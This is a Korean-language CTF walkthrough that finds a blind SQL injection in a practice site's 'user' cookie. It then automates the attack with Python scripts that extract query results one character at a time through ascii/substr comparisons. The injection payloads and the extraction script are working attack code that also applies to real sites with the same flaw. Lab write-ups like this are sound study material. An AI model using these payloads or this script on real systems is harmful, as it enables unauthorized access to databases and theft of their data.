[CTF] SQL Injection Point 1

📌
SQLi 자동화하기
SQLi Point

로그인(아이디 xcvb)하고 마이페이지에 먼저 접속

일단 쿠키가 보이니 쿠키에 테스트

▼xcvb' and '1'='1

▼xcvb' and '1'='2

SQL문이 거짓일때 두번째 칸에 Nothing Here... 문구가 보이지 않는다.
이걸 이용해보자. 자동화해서!

---

1. Python 이용하여 로그인하기

import requests
url = "http://ctf.segfaulthub.com:7777/sqli_6/mypage.php"
success_message = 'Nothing Here'

def send_request(sql_query):
    cookie = {'user':sql_query,
              'PHPSESSID':'93mj6rtl3ros478psl52m96roh'
              }
    response = requests.post(url, cookies=cookie)
    return success_message in response.text


sql_query = input("sql을 입력하세요: ")
if send_request(sql_query):
    print("성공")
else:
    print("실패")    

SQL문이 참이면 마이페이지 두번째 입력칸에 Nothing Here...문구가 출력된다.

아이디를 넣었을때 잘 동작한다.

---

2. 자동화해서 데이터 추출하기

import requests
url = "http://ctf.segfaulthub.com:7777/sqli_6/mypage.php"
success_message = 'Nothing Here'

def send_request(sql_query):
    cookie = {'user':sql_query,
              'PHPSESSID':'93mj6rtl3ros478psl52m96roh'
              }
    response = requests.post(url, cookies=cookie)
    return success_message in response.text

'''
sql_query = input("sql을 입력하세요: ")
if send_request(sql_query):
    print("성공")
else:
    print("실패")    
'''

def Blind_SQLi(sql):
    extract_info = ''
    for i in range(1,101): #최대 100글자 까지 추출
        for j in range(32,127): #ascii 문자 범위
            payload = f"xcvb' and (ascii(substr(({sql}),{i},1))={j}) and '1'='1"
            if send_request(payload):
                extract_info += chr(j)
                break
        else:
            break # 더 이상 글자가 없으면 종료
    return extract_info
    

sql_query = input("SQL 쿼리를 입력하세요: ")

extracted_data = Blind_SQLi(sql_query)
print(f"Extracted Data: {extracted_data}")

공격 format은
xcvb' and (ascii(substr(({sql}),{i},1))={j})